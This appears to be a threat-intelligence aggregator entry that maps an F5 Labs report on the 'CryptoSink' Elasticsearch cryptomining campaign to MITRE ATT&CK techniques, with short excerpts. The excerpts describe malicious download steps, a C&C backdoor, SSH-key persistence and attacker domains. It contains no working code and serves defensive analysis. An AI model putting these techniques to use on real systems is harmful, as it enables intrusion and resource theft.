TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

F5 Labs

“CryptoSink” Campaign Deploys a New Miner Malware

2019-03-13 · Read original ↗

ATT&CK techniques detected

9 predictions
T1105Ingress Tool Transfer
73%
"server by adding the attacker ’ s ssh keys. - it uses several command and control ( c & c ) servers ; the current live c & c is located in china. while analyzing the campaign we ’ ve named cryptosink, we encountered a previously unseen method used by attackers to eliminate compet…"
T1059.004Unix Shell
72%
"the payload for linux involves several deployment steps. as in many similar campaigns, it uses the existing curl or wget linux commands to download and execute a spearhead bash script named ctos. sh. figure 3. http request delivering the linux payload the bash script checks wheth…"
T1496Resource Hijacking
68%
"“ cryptosink ” campaign deploys a new miner malware recently, threat researchers from f5 networks spotted a new campaign targeting elasticsearch systems. it leverages an exploit from 2014 to spread several new malwares designed to deploy an xmr ( monero ) mining operation. - the …"
T1059.004Unix Shell
66%
"the executing the backdoor the file httpdz is another custom c + + malware implementing a backdoor / trojan functionality. like the dropper, it tries to connect one of three hardcoded c & c domains and start polling it for commands over a tcp socket. the communication protocol is…"
T1204.002Malicious File
64%
"time of this research ). figure 7. dropper is not being detected by antivirus solutions ( at the time of this research ) while retrieving threat intelligence information from virustotal for the domain w. 3ei. xyz, from which the spearhead script and the dropper were downloaded, w…"
T1496.001Compute Hijacking
56%
"“ cryptosink ” campaign deploys a new miner malware recently, threat researchers from f5 networks spotted a new campaign targeting elasticsearch systems. it leverages an exploit from 2014 to spread several new malwares designed to deploy an xmr ( monero ) mining operation. - the …"
T1496.001Compute Hijacking
35%
"to use a publicly available pool, which enables us to see the number of mining nodes and the earnings from this campaign using the wallet address. figure 26. wallet address is figure 27. the mining revenue for this wallet at the time of this research an additional wallet id was f…"
T1059Command and Scripting Interpreter
35%
"the executing the backdoor the file httpdz is another custom c + + malware implementing a backdoor / trojan functionality. like the dropper, it tries to connect one of three hardcoded c & c domains and start polling it for commands over a tcp socket. the communication protocol is…"
T1098.004SSH Authorized Keys
31%
"c & c traffic of such crypto - miners. based on a scan from january 29, 2019, the thyrsi. com domain seemed to be hosting a windows trojan, in the past based on a scan we have found from the 29th of january this year. figure 14. zer0day. ru subdomains reported observed by virusto…"

Summary

Attackers continue to exploit old vulnerabilities, use new methods to kill competing crypto-miners, and survive removal by administrators.